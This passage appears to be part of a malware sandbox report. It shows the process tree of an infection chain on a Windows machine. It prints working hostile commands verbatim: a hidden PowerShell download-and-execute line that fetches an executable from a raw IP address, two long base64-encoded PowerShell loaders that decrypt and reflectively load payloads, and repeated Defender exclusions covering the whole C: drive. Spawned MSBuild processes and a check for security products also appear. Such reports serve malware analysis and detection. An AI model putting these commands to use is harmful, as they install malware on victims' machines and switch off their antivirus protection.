      PID:4152
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2536
      - C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
        6⤵
        
        PID:5348
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10364621121\2GF9eeb.cmd"
    3⤵
    PID:3216
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10364621121\2GF9eeb.cmd"
      4⤵
      PID:5152
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5512
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4964
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10364641121\2GF9eeb.cmd"
    3⤵
    PID:5044
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10364641121\2GF9eeb.cmd"
      4⤵
      PID:2204
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4744
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1896
- - C:\Users\Admin\AppData\Local\Temp\10364650101\FMXv4s3.exe
    "C:\Users\Admin\AppData\Local\Temp\10364650101\FMXv4s3.exe"
    3⤵
    PID:1072
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:3988
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:5748
- - C:\Users\Admin\AppData\Local\Temp\10364660101\EPTwCQd.exe
    "C:\Users\Admin\AppData\Local\Temp\10364660101\EPTwCQd.exe"
    3⤵
    PID:5336
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:5244
- - C:\Users\Admin\AppData\Local\Temp\10364670101\Rm3cVPI.exe
    "C:\Users\Admin\AppData\Local\Temp\10364670101\Rm3cVPI.exe"
    3⤵
    PID:4692
- - C:\Users\Admin\AppData\Local\Temp\10364680101\7IIl2eE.exe
    "C:\Users\Admin\AppData\Local\Temp\10364680101\7IIl2eE.exe"
    3⤵
    PID:6132
  - - C:\Windows\SysWOW64\CMD.exe
      "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
      4⤵
      PID:3140
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:13256
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "opssvc wrsa"
        5⤵
        
        PID:13280
- - C:\Users\Admin\AppData\Local\Temp\10364690101\20fd708f32.exe
    "C:\Users\Admin\AppData\Local\Temp\10364690101\20fd708f32.exe"
    3⤵
    PID:3252
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3252 -s 728
      4⤵
      Program crash
      PID:4460
- - C:\Users\Admin\AppData\Local\Temp\10364700101\u75a1_003.exe
    "C:\Users\Admin\AppData\Local\Temp\10364700101\u75a1_003.exe"
    3⤵
    PID:920
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
      4⤵
      PID:3692
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-MpPreference -ExclusionPath 'C:'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3196
  - - C:\Windows\system32\svchost.exe
      "C:\Windows\system32\svchost.exe"
      4⤵
      PID:412
    - - C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
        
        "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
        5⤵
        
        PID:3460
    - - C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
        5⤵
        
        PID:4916
- - C:\Users\Admin\AppData\Local\Temp\10364710101\TbV75ZR.exe
    "C:\Users\Admin\AppData\Local\Temp\10364710101\TbV75ZR.exe"
    3⤵
    PID:1688
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:3760
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:2788
- - C:\Users\Admin\AppData\Local\Temp\10364720101\UYpk7xI.exe
    "C:\Users\Admin\AppData\Local\Temp\10364720101\UYpk7xI.exe"
    3⤵
    PID:8572
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:8716
- - C:\Users\Admin\AppData\Local\Temp\10364730101\71480e08f3.exe
    "C:\Users\Admin\AppData\Local\Temp\10364730101\71480e08f3.exe"
    3⤵
    PID:11748
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:19500
- - C:\Users\Admin\AppData\Local\Temp\10364740101\928952f091.exe
    "C:\Users\Admin\AppData\Local\Temp\10364740101\928952f091.exe"
    3⤵
    PID:18312
- - C:\Users\Admin\AppData\Local\Temp\10364750101\e07abee469.exe
    "C:\Users\Admin\AppData\Local\Temp\10364750101\e07abee469.exe"
    3⤵
    PID:24996
- - C:\Users\Admin\AppData\Local\Temp\10364760101\aeed845089.exe
    "C:\Users\Admin\AppData\Local\Temp\10364760101\aeed845089.exe"
    3⤵
    PID:18800
